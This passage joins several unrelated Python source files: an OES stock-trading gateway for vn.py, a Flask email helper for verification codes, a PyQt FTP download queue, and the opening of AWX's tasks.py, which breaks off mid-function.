        # BUGFIX: OES reports cash in 1/10000 units; convert like
        # OesTdApi.on_query_asset does (the two paths previously disagreed).
        balance = data.currentTotalBal / 10000
        availiable = data.currentAvailableBal / 10000
        # drawable = data.currentDrawableBal
        account_id = data.cashAcctId
        account = AccountData(
            gateway_name=self.gateway.gateway_name,
            accountid=account_id,
            balance=balance,
            frozen=balance - availiable,
        )
        self.gateway.on_account(account)
        return 1
class OesTdApi:
    """Trading API wrapper around the OES client library.

    Owns three channels — order (ord), query (qry) and report (rpt) — and an
    OesTdMessageLoop that consumes the report channel on a worker thread.
    """

    def __init__(self, gateway: BaseGateway):
        """Create the API bound to *gateway*; fill the config fields before connect()."""
        # connection settings, populated by the gateway before connect()
        self.config_path: str = ''
        self.ord_server: str = ''
        self.qry_server: str = ''
        self.rpt_server: str = ''
        self.username: str = ''
        self.password: str = ''
        self.hdd_serial: str = ''
        self.customize_ip: str = ''
        self.customize_mac: str = ''
        self.gateway = gateway
        self._env = OesApiClientEnvT()
        self._order_manager: "OrderManager" = OrderManager(self.gateway.gateway_name)
        self._message_loop = OesTdMessageLoop(gateway,
                                              self._env,
                                              self,
                                              self._order_manager
                                              )
        self._last_seq_lock = Lock()
        self._last_seq_index = 1000000  # 0 has special meaning for oes
        self._ord_reconnect_lock = Lock()

    def connect(self):
        """Connect all three channels to the trading server.

        :note: set config_path before calling this function.
        Always returns True; channel failures are only logged.
        """
        OesApi_InitLogger(self.config_path, 'log')
        OesApi_SetCustomizedIpAndMac(self.customize_ip, self.customize_mac)
        OesApi_SetCustomizedDriverId(self.hdd_serial)
        if not self._connect_ord_channel():
            self.gateway.write_log(_("无法初始化交易下单通道(td_ord_server)"))
        if not self._connect_qry_channel():
            self.gateway.write_log(_("无法初始化交易查询通道(td_qry_server)"))
        if not self.connect_rpt_channel():
            # BUGFIX: this message used to be a copy-paste of the qry-channel one
            self.gateway.write_log(_("无法初始化交易回报通道(td_rpt_server)"))
        return True

    def start(self):
        """Start consuming report messages."""
        self._message_loop.start()

    def stop(self):
        """Stop the message loop and tear down all OES channels."""
        self._message_loop.stop()
        OesApi_LogoutAll(self._env, True)
        # NOTE: "Destory" spelling is the vendor API's, not ours
        OesApi_DestoryAll(self._env)

    def join(self):
        """Wait for the message loop thread to finish."""
        self._message_loop.join()

    def _get_new_seq_index(self):
        """Atomically allocate the next client sequence number."""
        with self._last_seq_lock:
            index = self._last_seq_index
            self._last_seq_index += 1
            return index

    def _connect_qry_channel(self):
        OesApi_SetThreadUsername(self.username)
        OesApi_SetThreadPassword(self.password)
        return OesApi_InitQryChannel2(self._env.qryChannel,
                                      create_remote_config(self.qry_server,
                                                           self.username,
                                                           self.password))

    def _connect_ord_channel(self):
        OesApi_SetThreadUsername(self.username)
        OesApi_SetThreadPassword(self.password)
        if not OesApi_InitOrdChannel2(self._env.ordChannel,
                                      create_remote_config(self.ord_server,
                                                           self.username,
                                                           self.password),
                                      0):
            return False
        # never reuse sequence numbers already consumed in a previous session
        self._last_seq_index = max(self._last_seq_index, self._env.ordChannel.lastOutMsgSeq + 1)
        return True

    def connect_rpt_channel(self):
        """(Re)connect the report channel, subscribing to all report types we handle."""
        OesApi_SetThreadUsername(self.username)
        OesApi_SetThreadPassword(self.password)
        subscribe_info = OesApiSubscribeInfoT()
        subscribe_info.clEnvId = 0
        subscribe_info.rptTypes = (eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_BUSINESS_REJECT
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_INSERT
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_REPORT
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_TRADE_REPORT
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_FUND_TRSF_REPORT
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_CASH_ASSET_VARIATION
                                   | eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_HOLDING_VARIATION
                                   )
        return OesApi_InitRptChannel2(self._env.rptChannel,
                                      create_remote_config(self.rpt_server,
                                                           self.username,
                                                           self.password),
                                      subscribe_info,
                                      0)

    def _reconnect_ord_channel(self):
        """Blockingly retry the order channel until it comes back."""
        with self._ord_reconnect_lock:  # prevent spawning multiple reconnect thread
            self.gateway.write_log(_("正在重新连接到交易下单通道"))
            while not self._connect_ord_channel():
                time.sleep(1)
            self.gateway.write_log(_("成功重新连接到交易下单通道"))

    def _schedule_reconnect_ord_channel(self):
        """Run the order-channel reconnect loop on a background thread."""
        Thread(target=self._reconnect_ord_channel, ).start()

    def query_account(self):
        """Query cash assets; results arrive via on_query_asset."""
        OesApi_QueryCashAsset(self._env.qryChannel,
                              OesQryCashAssetFilterT(),
                              self.on_query_asset
                              )

    def on_query_asset(self,
                       session_info: SGeneralClientChannelT,
                       head: SMsgHeadT,
                       body: Any,
                       cursor: OesQryCursorT,
                       ):
        """Per-record callback for query_account: emit an AccountData."""
        data = cast.toOesCashAssetItemT(body)
        balance = data.currentTotalBal / 10000  # 1/10000 units -> currency
        availiable = data.currentAvailableBal / 10000
        # drawable = data.currentDrawableBal
        account_id = data.cashAcctId
        account = AccountData(
            gateway_name=self.gateway.gateway_name,
            accountid=account_id,
            balance=balance,
            frozen=balance - availiable,
        )
        self.gateway.on_account(account)
        return 1

    def query_stock(self, ) -> bool:
        """Query all stock contracts; results arrive via on_query_stock."""
        f = OesQryStockFilterT()
        ret = OesApi_QueryStock(self._env.qryChannel, f, self.on_query_stock)
        return ret >= 0

    def on_query_stock(self,
                       session_info: SGeneralClientChannelT,
                       head: SMsgHeadT,
                       body: Any,
                       cursor: OesQryCursorT,
                       ):
        """Per-record callback for query_stock: emit a ContractData."""
        data: OesStockBaseInfoT = cast.toOesStockItemT(body)
        contract = ContractData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            name=data.securityName,
            product=PRODUCT_OES2VT[data.mktId],
            size=data.buyQtyUnit,
            min_volume=100,
            net_position=True,
            pricetick=data.priceUnit,
        )
        self.gateway.on_contract(contract)
        return 1

    def query_option(self) -> bool:
        """Query all option contracts; results arrive via on_query_option."""
        f = OesQryOptionFilterT()
        ret = OesApi_QueryOption(self._env.qryChannel,
                                 f,
                                 self.on_query_option
                                 )
        return ret >= 0

    def on_query_option(self,
                        session_info: SGeneralClientChannelT,
                        head: SMsgHeadT,
                        body: Any,
                        cursor: OesQryCursorT,
                        ):
        """Per-record callback for query_option: emit a ContractData."""
        data = cast.toOesOptionItemT(body)
        contract = ContractData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            name=data.securityName,
            product=PRODUCT_OES2VT[data.mktId],
            size=data.roundLot,
            pricetick=data.tickSize,
        )
        self.gateway.on_contract(contract)
        return 1

    def query_stock_holding(self) -> bool:
        """Query stock holdings; results arrive via on_query_stock_holding."""
        f = OesQryStkHoldingFilterT()
        ret = OesApi_QueryStkHolding(self._env.qryChannel,
                                     f,
                                     self.on_query_stock_holding
                                     )
        return ret >= 0

    def on_query_stock_holding(self,
                               session_info: SGeneralClientChannelT,
                               head: SMsgHeadT,
                               body: Any,
                               cursor: OesQryCursorT,
                               ):
        """Per-record callback for query_stock_holding: emit a net PositionData."""
        data = cast.toOesStkHoldingItemT(body)
        position = PositionData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            direction=Direction.NET,
            volume=data.sumHld,
            frozen=data.lockHld,
            price=data.costPrice / 10000,
            # pnl=data.costPrice - data.originalCostAmt,
            pnl=0,
            yd_volume=data.originalHld,
        )
        self.gateway.on_position(position)
        return 1

    def query_option_holding(self) -> bool:
        """Query option holdings; results arrive via on_query_holding."""
        # NOTE(review): this builds a *stock* holding filter for an option
        # holding query — verify against the OES API whether
        # OesQryOptHoldingFilterT is intended here.
        f = OesQryStkHoldingFilterT()
        f.mktId = eOesMarketIdT.OES_MKT_ID_UNDEFINE
        ret = OesApi_QueryOptHolding(self._env.qryChannel,
                                     f,
                                     self.on_query_holding
                                     )
        return ret >= 0

    def on_query_holding(self,
                         session_info: SGeneralClientChannelT,
                         head: SMsgHeadT,
                         body: Any,
                         cursor: OesQryCursorT,
                         ):
        """Per-record callback for query_option_holding: emit long and short legs."""
        data = cast.toOesOptHoldingItemT(body)
        # rights side (long)
        pos_long = PositionData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            direction=Direction.LONG,
            volume=data.hldA,
            frozen=data.hldRA,
            price=0,
            # pnl=data.costPrice - data.originalCostAmt,
            pnl=0,
            yd_volume=0,
        )
        self.gateway.on_position(pos_long)
        # obligations side (short)
        pos_short = PositionData(
            gateway_name=self.gateway.gateway_name,
            symbol=data.securityId,
            exchange=EXCHANGE_OES2VT[data.mktId],
            direction=Direction.SHORT,
            volume=data.hldB,
            frozen=data.hldRB,
            price=0,
            # pnl=data.costPrice - data.originalCostAmt,
            pnl=0,
            yd_volume=0,
        )
        self.gateway.on_position(pos_short)
        return 1

    def query_contracts(self):
        """Query all tradable contracts (options/issues currently disabled)."""
        self.query_stock()
        # self.query_option()
        # self.query_issue()

    def query_position(self):
        """Query all holdings (stock and option)."""
        self.query_stock_holding()
        self.query_option_holding()

    def send_order(self, vt_req: OrderRequest):
        """Translate a vn.py OrderRequest into an OES order and send it.

        Returns the vt_orderid of the created (possibly rejected) order.
        """
        seq_id = self._get_new_seq_index()
        order_id = seq_id
        oes_req = OesOrdReqT()
        oes_req.clSeqNo = seq_id
        oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
        oes_req.ordType = ORDER_TYPE_VT2OES[(vt_req.exchange, vt_req.type)]
        oes_req.bsType = BUY_SELL_TYPE_VT2OES[(vt_req.exchange, vt_req.offset, vt_req.direction)]
        oes_req.invAcctId = ""
        oes_req.securityId = vt_req.symbol
        oes_req.ordQty = int(vt_req.volume)
        oes_req.ordPrice = int(vt_req.price * 10000)  # currency -> 1/10000 units
        oes_req.origClOrdId = order_id
        order = vt_req.create_order_data(str(order_id), self.gateway.gateway_name)
        order.direction = Direction.NET  # fix direction into NET: stock only
        self._order_manager.save_order(order_id, order)
        ret = OesApi_SendOrderReq(self._env.ordChannel,
                                  oes_req
                                  )
        if ret >= 0:
            order.status = Status.SUBMITTING
        else:
            order.status = Status.REJECTED
            self.gateway.write_log(_("下单失败"))  # todo: can I stringify error?
            if is_disconnected(ret):
                self.gateway.write_log(_("下单时连接发现连接已断开,正在尝试重连"))
                self._schedule_reconnect_ord_channel()
        self.gateway.on_order(order)
        return order.vt_orderid

    def cancel_order(self, vt_req: CancelRequest):
        """Send a cancel request for a previously submitted order."""
        seq_id = self._get_new_seq_index()
        oes_req = OesOrdCancelReqT()
        order_id = int(vt_req.orderid)
        oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
        oes_req.clSeqNo = seq_id
        oes_req.origClSeqNo = order_id  # the order to cancel
        oes_req.invAcctId = ""
        oes_req.securityId = vt_req.symbol
        ret = OesApi_SendOrderCancelReq(self._env.ordChannel,
                                        oes_req)
        if ret < 0:
            self.gateway.write_log(_("撤单失败"))  # todo: can I stringify error?
            if is_disconnected(ret):  # is here any other ret code indicating connection lost?
                self.gateway.write_log(_("撤单时连接发现连接已断开,正在尝试重连"))
                self._schedule_reconnect_ord_channel()

    def query_order(self, internal_order: InternalOrder) -> bool:
        """Query a single order by its client sequence number."""
        f = OesQryOrdFilterT()
        f.mktId = EXCHANGE_VT2OES[internal_order.vt_order.exchange]
        f.clSeqNo = internal_order.order_id
        ret = OesApi_QueryOrder(self._env.qryChannel,
                                f,
                                self.on_query_order
                                )
        return ret >= 0

    def on_query_order(self,
                       session_info: SGeneralClientChannelT,
                       head: SMsgHeadT,
                       body: Any,
                       cursor: OesQryCursorT):
        """Per-record callback for query_order: refresh the cached order."""
        data: OesOrdCnfmT = cast.toOesOrdItemT(body)
        i = self._order_manager.get_order(data.clSeqNo)
        vt_order = i.vt_order
        vt_order.status = STATUS_OES2VT[data.ordStatus]
        vt_order.volume = data.ordQty
        vt_order.traded = data.cumQty
        self.gateway.on_order(copy(vt_order))
        return 1

    def query_orders(self) -> bool:
        """Query all of today's orders."""
        f = OesQryOrdFilterT()
        ret = OesApi_QueryOrder(self._env.qryChannel,
                                f,
                                self.on_query_orders
                                )
        return ret >= 0

    def on_query_orders(self,
                        session_info: SGeneralClientChannelT,
                        head: SMsgHeadT,
                        body: Any,
                        cursor: OesQryCursorT,
                        ):
        """Per-record callback for query_orders: emit each order."""
        data: OesOrdCnfmT = cast.toOesOrdItemT(body)
        vt_order = self._order_manager.oes_order_to_vt(data)
        self.gateway.on_order(vt_order)
        return 1
class OrderManager:
    """Tracks the mapping between OES client sequence numbers and vn.py orders."""

    def __init__(self, gateway_name: str):
        self._orders: Dict[int, InternalOrder] = {}
        self.gateway_name = gateway_name

    def oes_order_to_vt(self, data):
        """Translate an OES order record into a cached vn.py OrderData.

        If the order is already known, its cached OrderData is updated in
        place; otherwise a new OrderData is built and cached.
        """
        # Cancel-style records carry the original order id in origClSeqNo.
        order_id = getattr(data, "origClSeqNo", 0) or data.clSeqNo
        try:
            cached = self.get_order(order_id).vt_order
        except KeyError:
            # Unknown order (e.g. placed in a previous session): build it.
            offset = (Offset.OPEN
                      if data.bsType == eOesBuySellTypeT.OES_BS_TYPE_BUY
                      else Offset.CLOSE)
            vt_order = OrderData(
                gateway_name=self.gateway_name,
                symbol=data.securityId,
                exchange=EXCHANGE_OES2VT[data.mktId],
                orderid=str(order_id or data.origClSeqNo),  # generated id
                type=ORDER_TYPE_OES2VT[(data.mktId, data.ordType)],
                direction=Direction.NET,
                offset=offset,
                price=data.ordPrice / 10000,
                volume=data.ordQty,
                traded=data.cumQty,
                status=STATUS_OES2VT[
                    data.ordStatus],
                # this time should be generated automatically or by a static function
                time=parse_oes_datetime(data.ordDate, data.ordCnfmTime).isoformat(),
            )
            self.save_order(order_id, vt_order)
            return vt_order
        cached.status = STATUS_OES2VT[data.ordStatus]
        cached.volume = data.ordQty
        cached.traded = data.cumQty
        cached.time = parse_oes_datetime(data.ordDate, data.ordTime).isoformat()
        return cached

    def save_order(self, order_id: int, order: OrderData):
        """Remember *order* under *order_id*."""
        self._orders[order_id] = InternalOrder(order_id=order_id, vt_order=order)

    def get_order(self, order_id: int):
        """Return the InternalOrder for *order_id*; raises KeyError if unknown."""
        return self._orders[order_id]
|
emails.py
|
# -*- coding:utf-8 -*-
"""
:author: Albert Li
:copyright: © 2020 Albert Li
:time: 2020/1/14 11:33
"""
from threading import Thread
from flask import current_app
from flask_mail import Message
from app.extensions import mail
def _send_async_mail(app, message: Message):
    """Deliver *message* from a worker thread.

    The worker thread has no application context of its own, so the app
    context must be pushed explicitly before the mail extension is used.
    """
    with app.app_context():
        mail.send(message)
def send_mail(
    to: list, title: str, mail_html: str = None, mail_body: str = None
) -> Thread:
    """Send an email asynchronously and return the worker thread.

    :param to: list of recipient addresses
    :param title: subject line
    :param mail_html: HTML body (preferred by capable mail clients)
    :param mail_body: plain-text fallback body
    """
    # Grab the real app object; current_app is only a context-local proxy.
    app = current_app._get_current_object()
    message = Message(title, recipients=to)
    message.html = mail_html
    message.body = mail_body
    worker = Thread(target=_send_async_mail, args=(app, message))
    worker.start()
    return worker
def send_register_mail(to: str, captcha: str) -> Thread:
    """Email a registration verification code to *to*.

    :param to: recipient address
    :param captcha: the verification code (valid for 10 minutes)
    """
    html = u'<p>您正在进行【iGank】的用户注册操作,您的验证码是<b style="font-size:1.5rem;color:#1F58B6;"> {captcha}</b>,10分钟内有效。</p>'.format(
        captcha=captcha
    )
    body = u"您正在进行【iGank】的用户注册操作,您的验证码是 {captcha},10分钟内有效".format(captcha=captcha)
    return send_mail([to], u"iGank 用户注册验证码", html, body)
def send_forgetpwd_mail(to: str, captcha: str) -> Thread:
    """Email a password-reset verification code to *to*.

    :param to: recipient address
    :param captcha: the verification code (valid for 10 minutes)
    """
    html = u'<p>您正在进行【iGank】的忘记密码操作,您的验证码是<b style="font-size:1.5rem;color:#1F58B6;"> {captcha}</b>,10分钟内有效。</p>'.format(
        captcha=captcha
    )
    body = u"您正在进行【iGank】的忘记密码操作,您的验证码是 {captcha},10分钟内有效".format(captcha=captcha)
    return send_mail([to], u"iGank 忘记密码验证码", html, body)
|
downloader.py
|
from ftpclient import FTPClient
import ftplib
import threading, os, time
from queue import Queue
from PyQt5.QtGui import QIcon, QPixmap
configFile = 'ftp-client.conf'
class Node:
    """A single queued FTP download request.

    Plain record consumed by Downloader: connection parameters, file
    metadata, a retry counter and the GUI widget dict used for status updates.
    """

    def __init__(self, hostname='localhost', port=2121, filesize=0, filename=None,
                 destpath='', pathname=None, guiwidget=None):
        # A download needs at least a file name and a remote path.  The
        # original `return None` here could not abort construction (an
        # __init__ return value is ignored) and left a half-built object
        # behind; fail loudly instead.
        if not filename or not pathname:
            raise ValueError("Node requires both filename and pathname")
        self.hostname = hostname  # default fixed from the 'locahost' typo
        self.port = port
        self.filesize = filesize
        self.filename = filename
        self.pathname = pathname
        self.tries = 0  # download attempts made so far
        self.destpath = destpath
        self.guiwidget = guiwidget
class Downloader:
    """Manages a queue of FTP downloads serviced by background worker threads."""

    def __init__(self):
        self.downloadQueue = Queue(maxsize=0)  # unbounded queue of Node objects
        self.maxWorkers = 2
        self.execute = True  # global on/off switch for the worker loops
        self.lock = threading.Lock()
        self.getDownloadPath()
        self.threadMonitor = threading.Thread(target=self.running_listener)
        self.threadMonitor.daemon = True  # setDaemon() is deprecated
        self.threadMonitor.start()

    def running_listener(self):
        """Respawn worker threads whenever they have all died.

        active_count() == 2 is taken to mean only the main thread and this
        monitor remain, i.e. no workers are alive — assumes the process has
        no other threads; verify if more threads are ever added.
        """
        while True:
            if self.execute and threading.active_count() == 2:
                for _ in range(self.maxWorkers):
                    worker = threading.Thread(target=self.downloader)
                    worker.daemon = True  # setDaemon() is deprecated
                    worker.start()
            time.sleep(1)

    def getDownloadPath(self):
        """Load the download directory from the config file, else ~/Download."""
        try:
            with open(configFile, 'r') as conf:
                self.downloadPath = conf.readline().strip()
            if not self.downloadPath:
                raise IOError  # empty config line -> use the default below
        except IOError:
            self.downloadPath = os.path.join(os.path.expanduser('~'), 'Download')

    def downloader(self):
        """Worker loop: pop nodes off the queue and download them.

        Each node gets up to 3 attempts.  On a transient error it is
        re-queued instead of re-raising (the original `raise e` silently
        killed the worker thread and lost the node), and task_done() is
        always called so Queue.join() cannot hang.
        """
        while self.execute:
            # Queue.get() is already thread-safe; the lock the original held
            # around it only serialized workers without adding safety.
            node = self.downloadQueue.get()
            guiwidget = node.guiwidget
            guiwidget['statusicon'].setText("In Queue")
            client = FTPClient(node.hostname, node.port)
            node.tries += 1
            guiwidget['label'].setText("Downloading")
            guiwidget['statusicon'].setPixmap(QPixmap('icons/running.svg'))
            try:
                if node.tries < 4 and client.downloadFile(pathname=node.pathname,
                                                          filename=node.filename,
                                                          destpath=node.destpath):
                    guiwidget['label'].setText("Completed")
                    guiwidget['statusicon'].setPixmap(QPixmap('icons/complete.svg'))
                    guiwidget['state'] = 'completed'
                elif node.tries >= 4:
                    guiwidget['label'].setText("Failed")
                    guiwidget['statusicon'].setPixmap(QPixmap('icons/failed.svg'))
                    guiwidget['state'] = 'failed'
                else:
                    # download returned falsy: put it back for another attempt
                    self.downloadQueue.put(node)
                    guiwidget['label'].setText("Waiting")
                    guiwidget['statusicon'].setPixmap(QPixmap('icons/wait.svg'))
                    guiwidget['state'] = 'waiting'
            except Exception:
                guiwidget['statusicon'].setPixmap(QPixmap('icons/failed.svg'))
                guiwidget['label'].setText("Network error. Retry")
                if node.tries < 4:
                    self.downloadQueue.put(node)  # retry later
                else:
                    guiwidget['state'] = 'failed'
            finally:
                # Always balance the get() above.
                self.downloadQueue.task_done()

    def addEntry(self, pathname, filesize, filename, guiwidget, destpath='',
                 hostname='localhost', port=2121):
        """Queue a new download; returns False if the entry is invalid."""
        try:
            node = Node(hostname=hostname, port=port, pathname=pathname,
                        filesize=filesize, filename=filename, guiwidget=guiwidget,
                        destpath=destpath)
        except ValueError:
            # original tested `if not Node:` (the class object — always
            # truthy) and then touched a misspelled `guiWidget` attribute
            guiwidget['state'] = 'failed'
            return False
        self.downloadQueue.put(node)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
# Public task entry points exported by this module.
__all__ = [
    'RunJob',
    'RunSystemJob',
    'RunProjectUpdate',
    'RunInventoryUpdate',
    'RunAdHocCommand',
    'handle_work_error',
    'handle_work_success',
    'apply_cluster_membership_policies',
    'update_inventory_computed_fields',
    'update_host_smart_inventory_memberships',
    'send_notifications',
    'purge_old_stdout_files',
]
# Placeholder substituted for real secrets in displayed/stored job data.
HIDDEN_PASSWORD = '**********'
# User-facing hint shown when an OpenSSH-format private key is unsupported.
# NOTE(review): "an different" is a typo in this user-visible text; left
# unchanged here because it is a runtime string, not a comment.
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
# Module-level logger for all task code in this file.
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
    """Raised when a job's configured virtualenv is missing or unusable."""

    def __init__(self, message):
        # BUGFIX: forward the message to Exception.__init__ so that
        # str(exc) and exc.args carry it (previously str(exc) was empty).
        super().__init__(message)
        self.message = message
def dispatch_startup():
    """One-time initialization when the task dispatcher process starts:
    sync schedules, apply cluster policy, heartbeat, reset metrics, and
    refresh the rsyslog configuration."""
    startup_logger = logging.getLogger('awx.main.tasks')
    startup_logger.debug("Syncing Schedules")
    for schedule in Schedule.objects.all():
        try:
            schedule.update_computed_fields()
        except Exception:
            logger.exception("Failed to rebuild schedule {}.".format(schedule))

    # When the dispatcher starts, if this instance is missing from the
    # database, it gets automatically re-registered.  Mostly useful for
    # openshift-based deployments: an instance that misses its heartbeat
    # during a network blip is deprovisioned by a peer, and re-registers
    # itself here once connectivity returns.  Traditional container-less
    # deployments never deprovision on a missed heartbeat, so for them
    # this is mostly a no-op.
    apply_cluster_membership_policies()
    cluster_node_heartbeat()
    Metrics().clear_values()

    # Update the rsyslog.conf file based on the logging settings in the db
    reconfigure_rsyslog()
def inform_cluster_of_shutdown():
    """Zero out this node's capacity and reap its jobs before shutdown."""
    try:
        inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
        inst.capacity = 0  # No thank you to new jobs while shut down
        inst.save(update_fields=['capacity', 'modified'])
        try:
            reaper.reap(inst)
        except Exception:
            logger.exception('failed to reap jobs for {}'.format(inst.hostname))
        logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(inst.hostname))
    except Exception:
        logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
    """Recompute instance-group membership from the three policy mechanisms
    (explicit instance list, per-group minimum count, percentage) and apply
    any differences to the database under a cluster-wide advisory lock."""
    started_waiting = time.time()
    with advisory_lock('cluster_policy_lock', wait=True):
        lock_time = time.time() - started_waiting
        # Log at info level only when acquiring the lock was slow.
        if lock_time > 1.0:
            to_log = logger.info
        else:
            to_log = logger.debug
        to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
        started_compute = time.time()
        all_instances = list(Instance.objects.order_by('id'))
        all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
        total_instances = len(all_instances)
        actual_groups = []
        actual_instances = []
        # Working records: a group with its computed members, and an instance
        # with the groups it has been assigned to so far.
        Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
        Node = namedtuple('Instance', ['obj', 'groups'])
        # Process policy instance list first, these will represent manually managed memberships
        instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
        for ig in all_groups:
            group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()])  # obtained in prefetch
            for hostname in ig.policy_instance_list:
                if hostname not in instance_hostnames_map:
                    logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
                    continue
                inst = instance_hostnames_map[hostname]
                group_actual.instances.append(inst.id)
                # NOTE: arguable behavior: policy-list-group is not added to
                # instance's group count for consideration in minimum-policy rules
            if group_actual.instances:
                logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
            actual_groups.append(group_actual)
        # Process Instance minimum policies next, since it represents a concrete lower bound to the
        # number of instances to make available to instance groups
        actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
        logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
        # Groups with the fewest members get first pick of instances; instances
        # in the fewest groups are preferred, to spread load evenly.
        for g in sorted(actual_groups, key=lambda x: len(x.instances)):
            policy_min_added = []
            for i in sorted(actual_instances, key=lambda x: len(x.groups)):
                if len(g.instances) >= g.obj.policy_instance_minimum:
                    break
                if i.obj.id in g.instances:
                    # If the instance is already _in_ the group, it was
                    # applied earlier via the policy list
                    continue
                g.instances.append(i.obj.id)
                i.groups.append(g.obj.id)
                policy_min_added.append(i.obj.id)
            if policy_min_added:
                logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
        # Finally, process instance policy percentages
        for g in sorted(actual_groups, key=lambda x: len(x.instances)):
            policy_per_added = []
            for i in sorted(actual_instances, key=lambda x: len(x.groups)):
                if i.obj.id in g.instances:
                    # If the instance is already _in_ the group, it was
                    # applied earlier via a minimum policy or policy list
                    continue
                if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
                    break
                g.instances.append(i.obj.id)
                i.groups.append(g.obj.id)
                policy_per_added.append(i.obj.id)
            if policy_per_added:
                logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
        # Determine if any changes need to be made
        needs_change = False
        for g in actual_groups:
            if set(g.instances) != set(g.prior_instances):
                needs_change = True
                break
        if not needs_change:
            logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
            return
        # On a differential basis, apply instances to groups
        with transaction.atomic():
            for g in actual_groups:
                if g.obj.is_container_group:
                    logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
                    continue
                instances_to_add = set(g.instances) - set(g.prior_instances)
                instances_to_remove = set(g.prior_instances) - set(g.instances)
                if instances_to_add:
                    logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
                    g.obj.instances.add(*instances_to_add)
                if instances_to_remove:
                    logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
                    g.obj.instances.remove(*instances_to_remove)
        logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
    """Invalidate cached settings (plus their direct dependents) on every node,
    and refresh rsyslog when any logging setting changed."""
    # Append dependents of the originally-passed keys in place, iterating a
    # snapshot so only the original keys are expanded (matches the original
    # behavior, including mutation of the caller's list).
    for key in tuple(setting_keys):
